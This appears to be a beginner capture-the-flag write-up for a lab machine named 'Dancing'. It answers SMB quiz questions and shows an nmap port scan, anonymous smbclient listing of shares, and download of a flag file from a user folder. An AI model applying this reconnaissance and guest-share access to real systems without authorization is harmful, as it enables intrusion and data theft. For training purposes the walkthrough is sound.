Dancing (Protocols, SMB, Reconnaissance, Anonymous/Guest Access)

The OSI Model for Cyber Security: A Comprehensive Guide to Securing Network Communications |…

An SMB-enabled storage on the network is called a share

What does the 3-letter acronym SMB stand for?

`1) Server Message Block

What port does SMB use to operate at?

  1. 445

What port does SMB use to operate at?

  1. microsoft-ds
└─$ nmap -p- --min-rate 5000 -sV 10.129.182.2
Host is up (0.30s latency).
Not shown: 65172 closed tcp ports (conn-refused), 352 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

What is the 'flag' or 'switch' that we can use with the smbclient utility to 'list' the available shares on Dancing?

  1. -L

How many shares are there on Dancing?

  1. 4
└─$ smbclient -L <Target Ip>

What is the command we can use within the SMB shell to download the files we find?

  1. get

Submit flag

└─$ smbclient \\\\\\\\10.129.126.147\\\\WorkShares
Password for [WORKGROUP\\kali]:
Try "help" to get a list of possible commands.
smb: \\> ls
  .                                   D        0  Mon Mar 29 13:52:01 2021
  ..                                  D        0  Mon Mar 29 13:52:01 2021
  Amy.J                               D        0  Mon Mar 29 14:38:24 2021
  James.P                             D        0  Thu Jun  3 14:08:03 2021

                5114111 blocks of size 4096. 1749281 blocks available
smb: \\> cd Amy.J\\
smb: \\Amy.J\\> ls
  .                                   D        0  Mon Mar 29 14:38:24 2021
  ..                                  D        0  Mon Mar 29 14:38:24 2021
  worknotes.txt                       A       94  Fri Mar 26 16:30:37 2021

                5114111 blocks of size 4096. 1753024 blocks available
smb: \\Amy.J\\> cd ..
smb: \\> cd James.P\\
smb: \\James.P\\> ls
  .                                   D        0  Thu Jun  3 14:08:03 2021
  ..                                  D        0  Thu Jun  3 14:08:03 2021
  flag.txt                            A       32  Mon Mar 29 14:56:57 2021

                5114111 blocks of size 4096. 1753024 blocks available
smb: \\James.P\\> get flag.txt 
getting file \\James.P\\flag.txt of size 32 as flag.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \\James.P\\> exit